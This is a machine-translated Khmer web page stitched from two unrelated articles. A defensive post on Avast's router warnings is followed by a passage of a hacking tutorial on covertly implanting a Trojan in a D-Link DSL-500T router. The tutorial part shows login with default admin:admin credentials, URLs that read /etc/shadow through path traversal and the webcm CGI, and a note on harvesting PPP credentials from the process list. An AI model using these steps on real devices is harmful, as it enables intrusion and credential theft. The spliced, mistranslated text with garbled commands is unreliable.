ផ្ទះ ដើមឈើហូបផ្លែ របៀបពិនិត្យរ៉ោតទ័ររកមេរោគ។ របៀបពិនិត្យមើលរ៉ោតទ័ររបស់អ្នកសម្រាប់ការឆ្លងមេរោគ VPNFilter ។ ការការពារឧបករណ៍បណ្តាញពីមេរោគ

របៀបពិនិត្យរ៉ោតទ័ររកមេរោគ។ របៀបពិនិត្យមើលរ៉ោតទ័ររបស់អ្នកសម្រាប់ការឆ្លងមេរោគ VPNFilter ។ ការការពារឧបករណ៍បណ្តាញពីមេរោគ

រហូតមកដល់ពេលថ្មីៗនេះ ខ្ញុំមិនដឹងថា រ៉ោតទ័រ Avast បំភ័យអ្នកប្រើប្រាស់របស់ខ្លួនជាមួយនឹងការព្រមាន "គួរឱ្យខ្លាច" ទាក់ទងនឹងរ៉ោតទ័ររបស់ពួកគេ។ ដូចដែលវាបានប្រែក្លាយ កំចាត់មេរោគ Avast ស្កេនរ៉ោតទ័រ Wi-Fi ។ វាផ្តល់លទ្ធផលដែលរ៉ោតទ័រត្រូវបានកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវ ឧបករណ៍ងាយរងការវាយប្រហារ ឬជាទូទៅរ៉ោតទ័រត្រូវបានឆ្លងមេរោគ ហើយអ្នកវាយប្រហារបានស្ទាក់ចាប់អាសយដ្ឋាន DNS រួចហើយ ហើយកំពុងបញ្ជូនអ្នកទៅកាន់គេហទំព័រព្យាបាទ ដោយជោគជ័យ លួចព័ត៌មានកាតឥណទាន និង ជាទូទៅអ្វីគ្រប់យ៉ាងគឺអាក្រក់ណាស់។ ពិតណាស់ ការព្រមានទាំងអស់នេះគឺមានរដូវកាលជាមួយនឹងពណ៌ក្រហមដ៏គ្រោះថ្នាក់ និងការណែនាំដែលច្របូកច្របល់ ដែលសូម្បីតែអ្នកឯកទេសល្អក៏នឹងមិនយល់ដោយគ្មានស្រាបៀរដែរ។ ខ្ញុំមិននិយាយអំពីអ្នកប្រើប្រាស់ធម្មតាទេ។ នេះជារបៀបដែលបញ្ហាដែលរកឃើញនៅលើរ៉ោតទ័រ D-Link DIR-615 មើលទៅដូចនេះ៖

ឧបករណ៍នេះងាយរងការវាយប្រហារ៖

នៃដំណោះស្រាយ ជាការពិត ការធ្វើបច្ចុប្បន្នភាពកម្មវិធីបង្កប់របស់រ៉ោតទ័រ។ សម្រាប់អ្វីផ្សេងទៀត 🙂 Avast ក៏អាចបង្ហាញសារដែលរ៉ោតទ័ររបស់អ្នកត្រូវបានការពារដោយពាក្យសម្ងាត់ខ្សោយ ឬរ៉ោតទ័រមិនត្រូវបានការពារពីការលួចចូល។

ក្នុងករណីខ្លះអ្នកអាចឃើញសារនោះ។ រ៉ោតទ័ររបស់អ្នកបានឆ្លងមេរោគហើយការតភ្ជាប់ត្រូវបានបញ្ជូនបន្តទៅកាន់ម៉ាស៊ីនមេដែលមានគំនិតអាក្រក់។ Avast Antivirus ពន្យល់រឿងនេះដោយនិយាយថារ៉ោតទ័ររបស់អ្នកត្រូវបានលួចចូល ហើយអាសយដ្ឋាន DNS របស់វាត្រូវបានផ្លាស់ប្តូរទៅជាមេរោគ។ ហើយវាក៏ផ្តល់ការណែនាំសម្រាប់ការដោះស្រាយបញ្ហានេះសម្រាប់រ៉ោតទ័រផ្សេងៗគ្នាផងដែរ៖ ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys / Cisco, NETGEAR, Sagem / Sagemco ។

សរុបមក ការណែនាំទាំងអស់នេះគឺមានគោលបំណងពិនិត្យមើលអាសយដ្ឋាន DNS និងសេវាកម្មដែលពាក់ព័ន្ធជាមួយ DNS ។ តាមរយៈនោះអ្នកវាយប្រហារអាចផ្លាស់ប្តូរ DNS នៅលើរ៉ោតទ័ររបស់អ្នក និងបញ្ជូនអ្នកទៅកាន់គេហទំព័រព្យាបាទរបស់ពួកគេ។ មានការណែនាំលម្អិតអំពីរបៀបពិនិត្យមើលអ្វីគ្រប់យ៉ាងនៅលើរ៉ោតទ័រពីក្រុមហ៊ុនផលិតផ្សេងៗគ្នា។

តើធ្វើដូចម្តេចដើម្បីឆ្លើយតបទៅនឹងការព្រមានពី Avast អំពីភាពងាយរងគ្រោះរបស់រ៉ោតទ័រ?

ខ្ញុំគិតថាអ្នកគ្រប់គ្នាចាប់អារម្មណ៍នឹងសំណួរនេះ។ ជាពិសេសប្រសិនបើអ្នកបានចុះចតនៅលើទំព័រនេះ។ ប្រសិនបើអ្នកឆ្ងល់ថាតើខ្ញុំនឹងប្រតិកម្មយ៉ាងណាចំពោះការព្រមានបែបនេះពីកំចាត់មេរោគនោះ ចម្លើយគឺសាមញ្ញ - គ្មានផ្លូវទេ។ ខ្ញុំប្រាកដថា Avast នឹងរកឃើញរន្ធនៅក្នុងរ៉ោតទ័ររបស់ខ្ញុំ ដែលខ្ញុំអាចត្រូវបានគេលួចចូល។ ខ្ញុំទើបតែមាន Dr.Web ។ គាត់មិនធ្វើការត្រួតពិនិត្យទាំងនេះទេ។

ប្រហែលជាខ្ញុំខុស ប៉ុន្តែគ្មានកម្មវិធីកំចាត់មេរោគណាក្រៅពី Avast ពិនិត្យរ៉ោតទ័រ Wi-Fi ដែលអ្នកបានភ្ជាប់សម្រាប់ភាពងាយរងគ្រោះផ្សេងៗ។ ហើយមុខងារនេះហៅថា Home Network Security បានបង្ហាញខ្លួនវិញក្នុងឆ្នាំ 2015។ នៅក្នុងកំណែ Avast 2015 ។

Avast ស្កេនរ៉ោតទ័រសម្រាប់បញ្ហាសុវត្ថិភាពឧបករណ៍។ យ៉ាង​ណា​មិញ ខ្ញុំ​មិន​យល់​ច្បាស់​ពី​របៀប​ដែល​គាត់​ធ្វើ​នោះ​ទេ។ ឧទាហរណ៍ របៀបដែលវាពិនិត្យពាក្យសម្ងាត់ដូចគ្នា ដើម្បីបញ្ចូលការកំណត់រ៉ោតទ័រ។ ធ្វើតាមអ្នកប្រើប្រាស់ ឬវិធីសាស្ត្រជ្រើសរើស? ប្រសិនបើអ្នករើសវា ពាក្យសម្ងាត់គឺអាក្រក់ 🙂 មិនអីទេ ខ្ញុំមិនមែនជាអ្នកសរសេរកម្មវិធីទេ។

ដោយផ្ទាល់ ខ្ញុំជឿថាការព្រមានទាំងអស់នេះគឺគ្មានអ្វីក្រៅពីការណែនាំសាមញ្ញសម្រាប់ការពង្រឹងការការពាររ៉ោតទ័ររបស់អ្នក។ នេះមិនមានន័យថាមាននរណាម្នាក់បានលួចចូល និងលួចទិន្នន័យរបស់អ្នករួចហើយនោះទេ។ អ្វីដែល Avast ផ្តល់ជូន៖

  • កំណត់ពាក្យសម្ងាត់ល្អ និងធ្វើបច្ចុប្បន្នភាពកម្មវិធីបង្កប់រ៉ោតទ័រ។ ពួកគេនិយាយថា បើមិនដូច្នេះទេ អ្នកអាចត្រូវបានគេលួចចូល។ យល់ព្រម នោះជាការយល់។ វាមិនចាំបាច់បង្ហាញសញ្ញាថាជាប្រភេទនៃភាពងាយរងគ្រោះដែលគួរឱ្យខ្លាចនោះទេ។ ទោះបីជាម្តងទៀត ខ្ញុំមិនយល់ពីរបៀបដែលកំចាត់មេរោគកំណត់ថាកំណែរបស់កម្មវិធីរ៉ោតទ័រគឺហួសសម័យហើយ។ វាហាក់ដូចជាខ្ញុំថានេះមិនអាចទៅរួចទេ។
  • រ៉ោតទ័រមិនត្រូវបានការពារពីការភ្ជាប់ពីអ៊ីនធឺណិតទេ។ ភាគច្រើនទំនងជាការព្រមានបែបនេះលេចឡើងបន្ទាប់ពីពិនិត្យមើលច្រកដែលបើក។ ប៉ុន្តែតាមលំនាំដើម នៅលើរ៉ោតទ័រទាំងអស់ មុខងារ "ចូលពី WAN" ត្រូវបានបិទ។ ខ្ញុំមានការងឿងឆ្ងល់យ៉ាងខ្លាំងថា នរណាម្នាក់នឹងលួចចូល Router របស់អ្នកតាមអ៊ីនធឺណិត។
  • ជាការប្រសើរណាស់, អ្វីដែលអាក្រក់បំផុតគឺការជំនួសអាសយដ្ឋាន DNS ។ ប្រសិនបើបញ្ហាណាមួយជាមួយ DNS ត្រូវបានរកឃើញ Avast សរសេរដោយផ្ទាល់រួចហើយថា "រ៉ោតទ័ររបស់អ្នកត្រូវបានឆ្លង!" ។ ប៉ុន្តែនៅក្នុង 99% នៃករណីវាមិនមែនទេ។ ជាថ្មីម្តងទៀត ស្ទើរតែគ្រប់រ៉ោតទ័រទទួល DNS ដោយស្វ័យប្រវត្តិពីអ្នកផ្តល់សេវា។ ហើយមុខងារ និងសេវាកម្មទាំងអស់ ដែលអ្នកវាយប្រហារអាចផ្លាស់ប្តូរ DNS ត្រូវបានបិទតាមលំនាំដើម។ វាហាក់ដូចជាខ្ញុំថា ជាញឹកញាប់កំចាត់មេរោគ "យល់" ការកំណត់អ្នកប្រើប្រាស់មួយចំនួនមិនត្រឹមត្រូវ។

អ្វីមួយ​ដូចនេះ។ ជាការពិតណាស់ អ្នកប្រហែលជាមិនយល់ស្របជាមួយខ្ញុំទេ។ វាហាក់ដូចជាខ្ញុំថាវាងាយស្រួលជាងក្នុងការចូលប្រើកុំព្យូទ័រដោយផ្ទាល់ និងឆ្លងមេរោគជាជាងធ្វើវាជាមួយរ៉ោតទ័រ។ ប្រសិនបើយើងកំពុងនិយាយអំពីការវាយប្រហារតាមរយៈអ៊ីនធឺណិត។ ខ្ញុំនឹងរីករាយដែលបានឃើញមតិរបស់អ្នកលើបញ្ហានេះនៅក្នុងមតិយោបល់។

តើធ្វើដូចម្តេចដើម្បីការពាររ៉ោតទ័រនិងលុបការព្រមានពី Avast?

តោះព្យាយាមដោះស្រាយជាមួយធាតុនីមួយៗដែល Avast ទំនងជាពិនិត្យ និងចេញការព្រមាន។

  • រ៉ោតទ័រត្រូវបានការពារដោយពាក្យសម្ងាត់ខ្សោយ។ មិនមានការអ៊ិនគ្រីបទេ។ក្នុងករណីដំបូងកំចាត់មេរោគមានពាក្យសម្ងាត់ដែលអ្នកត្រូវបញ្ចូលនៅពេលចូលទៅក្នុងការកំណត់រ៉ោតទ័រ។ ជាធម្មតា ពាក្យសម្ងាត់លំនាំដើមគឺអ្នកគ្រប់គ្រង។ ឬមិនបានដំឡើងអ្វីទាំងអស់។ ហើយវាប្រែថាអ្នកគ្រប់គ្នាដែលភ្ជាប់ទៅបណ្តាញរបស់អ្នកអាចចូលទៅក្នុងការកំណត់រ៉ោតទ័រ។ ដូច្នេះ ពាក្យសម្ងាត់នេះត្រូវតែផ្លាស់ប្តូរ។ របៀបធ្វើវាខ្ញុំបានសរសេរនៅក្នុងអត្ថបទ: ។ ចំពោះពាក្យសម្ងាត់បណ្តាញ Wi-Fi ក៏ត្រូវតែខ្លាំងដែរ ហើយប្រភេទការអ៊ិនគ្រីប WPA2 ត្រូវតែប្រើ។ ខ្ញុំតែងតែសរសេរអំពីរឿងនេះនៅក្នុងការណែនាំសម្រាប់ការដំឡើងរ៉ោតទ័រ។
  • រ៉ោតទ័រគឺងាយរងគ្រោះដោយសារកម្មវិធីចាស់។នេះមិនមែនជាការពិតទាំងស្រុងនោះទេ។ ប៉ុន្តែប្រសិនបើមានកម្មវិធីបង្កប់ថ្មីសម្រាប់ម៉ូដែលរ៉ោតទ័ររបស់អ្នក នោះវាត្រូវបានណែនាំឱ្យធ្វើបច្ចុប្បន្នភាពវា។ មិនត្រឹមតែធ្វើឱ្យប្រសើរឡើងនូវសុវត្ថិភាពប៉ុណ្ណោះទេ ប៉ុន្តែថែមទាំងសម្រាប់ប្រតិបត្តិការកាន់តែមានស្ថេរភាពនៃឧបករណ៍ និងមុខងារថ្មីៗផងដែរ។ យើងមានការណែនាំនៅលើគេហទំព័រសម្រាប់ធ្វើបច្ចុប្បន្នភាពកម្មវិធីសម្រាប់រ៉ោតទ័រពីក្រុមហ៊ុនផលិតផ្សេងៗគ្នា។ អ្នកអាចស្វែងរកតាមរយៈការស្វែងរក ឬសួរនៅក្នុងមតិយោបល់។ នេះគឺសម្រាប់។
  • ការកំណត់ DNS ត្រូវបានផ្លាស់ប្តូរ។ រ៉ោតទ័រត្រូវបានលួច។និយាយឱ្យត្រង់ទៅ ខ្ញុំមិនដែលឃើញករណីបែបនេះទេ។ ដូចដែលខ្ញុំបានសរសេរខាងលើ សេវាកម្មទាំងអស់ដែលវាអាចកើតឡើងត្រូវបានបិទតាមលំនាំដើម។ ជាញឹកញាប់បំផុត រ៉ោតទ័រទទួល DNS ពីអ្នកផ្តល់សេវាដោយស្វ័យប្រវត្តិ។ ដំបូន្មានតែមួយគត់ដែលខ្ញុំអាចផ្តល់ឱ្យគឺមិនត្រូវបញ្ចូលអាសយដ្ឋាន DNS ដោយដៃដែលអ្នកមិនប្រាកដអំពី។ ហើយប្រសិនបើអ្នកបញ្ជាក់អាសយដ្ឋានដោយដៃ នោះវាជាការប្រសើរក្នុងការប្រើតែ DNS របស់ Google ដែល៖ . នេះត្រូវបានណែនាំផងដែរនៅក្នុងការណែនាំ Avast ដែលអាចមើលបាននៅលើគេហទំព័រផ្លូវការ:. មានការណែនាំលម្អិតសម្រាប់ការដោះស្រាយបញ្ហា DNS សម្រាប់រ៉ោតទ័រស្ទើរតែទាំងអស់។

អស់ហើយ។ ខ្ញុំសង្ឃឹមថាយ៉ាងហោចណាស់ខ្ញុំអាចបញ្ជាក់ការព្រមានទាំងនេះនៅក្នុងកំចាត់មេរោគ Avast ។ សួរសំណួរនៅក្នុងមតិយោបល់ហើយកុំភ្លេចចែករំលែកព័ត៌មានមានប្រយោជន៍លើប្រធានបទនេះ។ សំណាងល្អ!

សួស្តីអ្នកអានរបស់ខ្ញុំ! នៅក្នុងអត្ថបទនេះខ្ញុំនឹងនិយាយអំពីរ៉ោតទ័រ ADSL ដ៏អស្ចារ្យ។
- បំណែកដែកដែលមិនអាចខ្វះបាននៅក្នុងបណ្តាញផ្ទះ និងឧស្សាហកម្ម។ ខ្ញុំនឹងប្រាប់អ្នកអំពីសំណួរ
ការកេងប្រវ័ញ្ចនៃបំណែកដែកទាំងនេះសម្រាប់គោលបំណងមានប្រយោជន៍ដល់យើង - ដេរយ៉ាងឃោរឃៅ
Trojan នៅខាងក្នុងរ៉ោតទ័រ។ ហើយតាមរបៀបដែលគ្មាននរណាម្នាក់កត់សម្គាល់
អ្នកគ្រប់គ្រងឆ្លាតវៃ គ្មានអ្នកប្រើប្រាស់ត្រចៀកធំទេ។

បំណងប្រាថ្នាឬតម្រូវការសម្រាប់ IQ

ពេល​ដែល​ខ្ញុំ​សរសេរ​អត្ថបទ​នេះ ខ្ញុំ​សន្មត​ថា​ការ​អាន​វា​គ្រប់គ្រាន់​ហើយ។
អ្នក​ប្រើ​កម្រិត​ខ្ពស់​ដែល​បាន​ដំឡើង GNU\Linux ដែល​មាន​ជំនាញ​ខ្លះ​ដែរ។
ការងារ និងការសរសេរកម្មវិធីនៅក្នុងប្រព័ន្ធប្រតិបត្តិការនេះ។ ទោះយ៉ាងណាក៏ដោយវាហាក់ដូចជា
អាចធ្វើម្តងទៀតនូវជំហានរបស់ខ្ញុំនៅលើ Windows (ដោយប្រើ Cygwin ឧទាហរណ៍) ប៉ុន្តែ
វានឹងមិនត្រូវបានពិពណ៌នាទេ។ សម្រាប់ការរីករាយអតិបរមាអ្នកក៏ត្រូវការផងដែរ។
ជំនាញផ្សារដែក (នេះជាជម្រើស)។

ហើយវាទាំងអស់បានចាប់ផ្តើម ...

អ្វីមួយដែលខ្ញុំច្របូកច្របល់។ ដូច្នេះវាទាំងអស់បានចាប់ផ្តើមជាមួយនឹងរបៀបដែលមួយថ្ងៃនេះ។
ដុំដែក ឬផ្ទុយទៅវិញ វាបានកាត់ផ្តាច់ការភ្ជាប់អ៊ីនធឺណេតដោយក្បត់ និងមិនបាន
ចង់ស្តារវាឡើងវិញ។ នៅពេលជាមួយគ្នានោះនាងនៅឆ្ងាយការចូលប្រើរាងកាយ
នាងមិននៅទីនោះទេ (ទោះជាយ៉ាងណា ខ្ញុំបានកុហកអ្វីមួយ - ខ្ញុំគ្រាន់តែខ្ជិលក្រោកពីសាឡុង
ចាប់ផ្តើមរ៉ោតទ័រឡើងវិញ :)) ចំណុចប្រទាក់គេហទំព័រមិនឆ្លើយតបទេ ប៉ុន្តែខ្ញុំចាំបានថានៅលើ
រឿងនេះគួរតែជា telnet ឬ ssh ។ ចូលទៅតំបន់រដ្ឋបាល
ពីមុន​មិន​បាន​ព្យាយាម​ប្តូរ​លេខ​សម្ងាត់​ទៅ​គណនី​របស់​ខ្ញុំ​ដោយ​មិន​ប្រុងប្រយ័ត្ន (ដូច​ជា
វាប្រែចេញនៅពេលក្រោយដោយឥតប្រយោជន៍ ព្រោះតាមលំនាំដើមវាគឺជា "admin: admin")។ ដូច្នេះ​ខ្ញុំ
សាកល្បង SSH ហើយវាដំណើរការ!

$ ssh [អ៊ីមែលការពារ]
$Password៖

ដូច​ជា​ដុំ​ខៀវ​! ប្រអប់រវល់! មិនដែលគិតពីអ្នកណាទេ។
រ៉ោតទ័រនេះគឺនៅក្នុងការគ្រប់គ្រងវាប្រែចេញ - GNU / Linux! ខ្ញុំ​ភ័យ​ខ្លាច
ខ្ញុំឆ្ងល់ពីរបៀបដែលអ្វីៗដំណើរការនៅទីនេះ ហើយអរគុណផ្លូវចិត្តចំពោះភាពខ្ជិល និងឱកាស
បានចាប់ផ្តើមការស្រាវជ្រាវ។

ការប្រមូលព័ត៌មាន

ដូច្នេះតើខ្ញុំចាប់ផ្តើមនៅឯណា? ជាការពិតណាស់ ពីបញ្ជីពាក្យបញ្ជាដែលមាន៖

#ប្រអប់រវល់
...
មុខងារដែលបានកំណត់បច្ចុប្បន្ន៖
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
ធ្វើសមកាលកម្ម, tar, សាកល្បង, tftp, ប៉ះ, ពិត, tty, umount, wget, whoami, បាទ

សំណុំនេះគឺល្អមែនទែន គ្រប់គ្រាន់សម្រាប់ការស្រាវជ្រាវធម្មតា និងការអនុវត្តគំនិត។
បន្ទាប់ ចំណាប់អារម្មណ៍បានកើតឡើងនៅក្នុងកំណែខឺណែល៖

# cat /proc/version
កំណែលីនុច 2.4.17_mvl21-malta-mips_fp_le ( [អ៊ីមែលការពារ]) (gcc កំណែ 2.95.3
20010315 (ចេញផ្សាយ/MontaVista)) #1 Thu ខែធ្នូ 28 05:45:00 CST 2006

សម្រាប់ឯកសារយោង៖ MontaVista គឺជាការចែកចាយដែលផ្តោតលើការបង្កប់
ប្រព័ន្ធ។ ក្រុមហ៊ុនផលិតឧបករណ៍បណ្តាញភាគច្រើនបោះបង់ចោល
ចំណូលចិត្តសម្រាប់ប្រព័ន្ធនេះ។ វាក៏អាចត្រូវបានរកឃើញនៅលើឧបករណ៍ផ្សេងទៀតឧទាហរណ៍ក្នុង
សៀវភៅអេឡិចត្រូនិច ឬទូរសព្ទដៃ។

# ឆ្មា /etc/versions
អតិថិជន=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
ក្តារ = AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
ខួរក្បាល
: 0
ម៉ូដែលស៊ីភីយូ
៖ MIPS 4KEc V4.8
BogoMIPS
: 149.91
រង់ចាំការណែនាំ៖ ទេ។
កម្មវិធីកំណត់ពេលវេលាមីក្រូវិនាទី៖ បាទ
វ៉ិចទ័ររំខានបន្ថែម៖ បាទ
ចំណុចឃ្លាំមើលផ្នែករឹង៖ បាទ
ករណីលើកលែង VCED៖ មិនមានទេ។
ករណីលើកលែង VCEI៖ មិនមានទេ។

AR7 គឺជាបន្ទះឈីប dual-core ដែលបង្កើតឡើងដោយ Texas Instruments ។ គាត់
មានរ៉ោតទ័រ ADSL ពេញលេញនៅលើបន្ទះឈីបតែមួយដែលគាំទ្រស្តង់ដារ ADSL1,
ADSL2, ADSL2+។ ដោយផ្អែកលើដំណើរការខ្ពស់ MIPS 4KEc RISC processor ជាមួយ
ប្រេកង់នាឡិកា 175 ឬ 233 (អាស្រ័យលើបច្ចេកវិទ្យាផលិតកម្ម: 18 µm
ឬ ១៣ μm) ។ បន្ទះឈីបនេះមានចំណុចប្រទាក់ UART 2 នៅលើក្តារ ដែលមួយក្នុងចំណោមនោះ (UART_A)
ប្រើដើម្បីបញ្ចេញព័ត៌មានបំបាត់កំហុស ក៏ដូចជាចំណុចប្រទាក់ EJTAG ដែលបម្រើ
សម្រាប់បំបាត់កំហុស (កម្មវិធីបង្កប់) អង្គចងចាំពន្លឺ។ អំពីការប្រើប្រាស់ចំណុចប្រទាក់ទាំងនេះនឹងត្រូវបាន
បានពិពណ៌នាខាងក្រោម។

ជាចុងក្រោយ ខ្ញុំបានមើលព័ត៌មាននៃការចងចាំ៖

# ឆ្មា / proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
គ្មាន / dev devfs rw 0 0
proc / proc proc rw 0 0
ramfs /var ramfs rw 0 0

# ឆ្មា / proc/mtd
dev: ទំហំ លុបឈ្មោះ
mtd0:0034f000 00010000 "mtd0"
mtd1:00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

តាមធម្មជាតិ កុំភ្លេចអំពីអាសយដ្ឋានប្លុក៖

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

ពីខាងលើវាធ្វើតាម Flash memory (/dev/mtdblock) មាន 5 ប្លុក៖

mtd0- រូបភាពប្រព័ន្ធឯកសារ SquashFs ។ នេះគឺជាឯកសារពិសេស
ប្រព័ន្ធដែលត្រូវបានបង្ហាប់ និងបានតែអាន។ សម្រាប់
ក្បួនដោះស្រាយការបង្ហាប់គឺ gzip ប៉ុន្តែក្នុងករណីនេះវាគឺជា LZMA (សមាមាត្របង្ហាប់
ខ្ពស់ជាង) ។ ទំហំនៃប្លុកនេះគឺ 4 MB ។

mtd1- ប្លុកនេះមានស្នូល MontaVista ដែលត្រូវបានបង្ហាប់ដោយក្បួនដោះស្រាយ LZMA
លក្ខខណ្ឌ ទំហំប្លុក 600 Kb ។

mtd2- កម្មវិធីចាប់ផ្ដើមប្រព័ន្ធ ADAM2 ដំណើរការខឺណែលចាប់ផ្ដើមក៏មាន
សេវាកម្ម FTP server សម្រាប់ការងើបឡើងវិញ និងពន្លឺ។ បន្ថែមទៀតអំពីវានឹងមាន
បាននិយាយបន្ថែមទៀត។ ទំហំប្លុកគឺ 64 KB ។

mtd3- ចែករំលែករវាងទិន្នន័យការកំណត់រចនាសម្ព័ន្ធ និងបរិស្ថាន
(អថេរបរិស្ថាន) ប្លុក ដែលអាចត្រូវបានមើលក្នុង /proc/ticfg/env ។
ទិន្នន័យកំណត់រចនាសម្ព័ន្ធគឺនៅក្នុង /etc/config.xml ។ អន្តរការីរវាងឯកសារ
ប្លុកការកំណត់រចនាសម្ព័ន្ធប្រព័ន្ធត្រូវបានបិទ (ដូចជា cm_* ទាំងអស់ដែលគ្រប់គ្រង, o
ពួកវានៅពេលក្រោយ) កម្មវិធី cm_logic ។ ទំហំនៃប្លុកនេះគឺ 64 KB ផងដែរ។

mtd4- វាមានហត្ថលេខាកម្មវិធីបង្កប់ ខឺណែល និងរូបភាពឯកសារ
ប្រព័ន្ធ។ ប្លុកនេះត្រូវបានប្រើនៅពេលធ្វើបច្ចុប្បន្នភាពកម្មវិធីបង្កប់តាមរយៈចំណុចប្រទាក់បណ្តាញ។
ដំបូងវាត្រូវបានរក្សាទុកនៅក្នុងប្លុកនេះបន្ទាប់មក checksum ត្រូវបានពិនិត្យ
ហើយប្រសិនបើវាបញ្ចូលគ្នា វាត្រូវបានសរសេរទៅកាន់ទីតាំងថ្មីរបស់វា។

RAM (16 MB នៅក្នុងម៉ូដែលនេះ ប៉ុន្តែ ADAM2 នៅក្នុងម៉ូដែលនេះ។
ឃើញត្រឹមតែ 14 MB ត្រូវបានព្យាបាលដោយការអាប់ដេត) ត្រូវបានភ្ជាប់ទៅថត /var និង
អាចត្រូវបានប្រើដោយសុវត្ថិភាពសម្រាប់គោលបំណងរបស់យើង:

# ឥតគិតថ្លៃ
សតិបណ្ដោះអាសន្នដែលបានប្រើដោយឥតគិតថ្លៃសរុប
ម: 14276 10452 3824 0

ចូរកុំភ្លេចទៅបញ្ជីនៃដំណើរការ។ នៃការលាក់ខ្លួនគួរឱ្យចាប់អារម្មណ៍នៅទីនេះ
ដេមិន៖ thttpd - ម៉ាស៊ីនមេបណ្តាញ; dproxy - ឃ្លាំងសម្ងាត់ សំណួរ DNS ម៉ាស៊ីនមេប្រូកស៊ី; ddnsd
- ដេមិន DNS ppd... - ដេមិនពិតប្រាកដដែលអនុវត្តការតភ្ជាប់ពិធីការ
PPP ហើយនៅក្នុងប៉ារ៉ាម៉ែត្រយើងឃើញព័ត៌មានគណនី។ ដូច្នេះប្រសិនបើរ៉ោតទ័រមិនមាន
ធ្វើពុតជាទុយោ (អាន - មិននៅក្នុងរបៀបស្ពាន) បន្ទាប់មកអ្នកអាចធ្វើបាន
ងាយស្រួលក្នុងការទទួលបានគណនី។

កម្មវិធី cm_* មានកម្មសិទ្ធិ ហើយត្រូវបានបញ្ចូលក្នុងកូដប្រភពរួចហើយ។
ចងក្រង (កម្មវិធីទាំងនេះក៏ត្រូវបានបង្កើតឡើងដោយ Texas Instruments នៅលើ D-Link
មិនចាំបាច់ស្បថចំពោះការមិនអនុលោមតាមអាជ្ញាប័ណ្ណទេ) ។

cm_logic- កម្មវិធីដែលគ្រប់គ្រងតក្កវិជ្ជានៃប្រព័ន្ធតាមរយៈវា។
ឆ្លងកាត់ការកំណត់; ធ្វើសមកាលកម្ម /etc/config.xml ជាមួយ
ផ្នែកដែលត្រូវគ្នានៃមាតិកានៃ /dev/ticfg (ចង្អុលទៅ mtd3) ។

cm_cli- ចំណុចប្រទាក់បន្ទាត់ពាក្យបញ្ជាសម្រាប់ការគ្រប់គ្រង និងការកំណត់រចនាសម្ព័ន្ធ
ប្រព័ន្ធ។ ឧទាហរណ៍ ការកំណត់ការតភ្ជាប់ត្រូវបានធ្វើឡើងតាមរយៈចំណុចប្រទាក់នេះ។

cm_pc- បើកដំណើរការ និងត្រួតពិនិត្យដំណើរការ តំណភ្ជាប់ជាមួយច្បាប់
(ឧទាហរណ៍ ដំណើរការកម្មវិធីជាដេមិន ច្បាប់ក៏រួមបញ្ចូលព័ត៌មានអំពី
ច្រកដែលត្រូវបើក) ដូចដែលបានពិពណ៌នានៅក្នុង /etc/progdefs.xml; ផ្ទុកភ្លាមៗបន្ទាប់ពី
ខឺណែល

webcm- ចំណុចប្រទាក់ CGI គឺពោរពេញទៅដោយរន្ធ ឧទាហរណ៍អនុញ្ញាតឱ្យអ្នកមើល /etc/shadow,
ដោយគ្រាន់តែចូលទៅកាន់ URL។

http://192.168.1.1/../../../etc/shadow

មិនមានអ្វីសោះ thttpd មិនសាមញ្ញទេ ប៉ុន្តែប្រសិនបើដូច្នេះ៖

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

រឿងមួយទៀត។ វាអាចត្រូវបានប្រើដើម្បីប្រមូលព័ត៌មានប្រសិនបើមិនមានសិទ្ធិចូលប្រើ
ssh/telnet ប៉ុន្តែមានការចូលប្រើចំណុចប្រទាក់បណ្តាញ។

firmwarecfg- ប្រើសម្រាប់បញ្ចេញពន្លឺតាមរយៈ Web interface ។ នៅច្រកចូល
នៃកម្មវិធីនេះ រូបភាពមួយត្រូវបានបញ្ជូនដោយសំណើ POST ពីចំណុចប្រទាក់គេហទំព័រ ហើយវាមានរួចហើយ
ប្តូរទិសទៅ Flash-memory បន្ទាប់ពីពិនិត្យមើល checksum នៃរូបភាព។

នេះបញ្ចប់ការប្រមូលព័ត៌មានបឋម វាដល់ពេលដែលត្រូវបន្តការសម្រេច
សកម្មភាព។

ការដំឡើងឧបករណ៍អភិវឌ្ឍន៍ និងការចងក្រងកម្មវិធីបង្កប់

កម្មវិធីបង្កប់សម្រាប់រ៉ោតទ័រ D-Link (និងផ្សេងទៀតទាំងអស់ដោយផ្អែកលើ GNU/Linux)
ចែកចាយក្រោមអាជ្ញាប័ណ្ណ GPL អ្នកអាចទទួលបានពួកវានៅលើផ្លូវការ
ម៉ាស៊ីនមេ FTP ។ តាមពិតទៅ អ្នកអាចជ្រើសរើសបញ្ជីកម្មវិធីបង្កប់ដែលបានស្នើណាមួយ
ពួកគេគឺដូចគ្នា (ទាក់ទងនឹងស៊េរី T) ។ នៅក្នុងការចែកចាយ - កូដប្រភពនៃខឺណែលបរិស្ថាន។
ឧបករណ៍ចាំបាច់ និងខ្សែសង្វាក់ឧបករណ៍សម្រាប់បង្កើត/ចងក្រងដែលមានស្រាប់
កម្មវិធី។ វាគួរតែត្រូវបានពន្លាទៅ root និងបន្ថែមទៅអថេរបរិស្ថាន
ផ្លូវ PATH ទៅកាន់ថតឯកសារ bin របស់ toolchain៖

$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/

ឥឡូវនេះ ដើម្បីចងក្រងកម្មវិធីបង្កប់ផ្ទាល់ខ្លួនរបស់អ្នក សូមចូលទៅកាន់ថតឯកសារ
ជាមួយកូដប្រភព និងប្រតិបត្តិដូចគ្នានេះ។

$ cd DSL/TYLinuxV3/src && បង្កើត

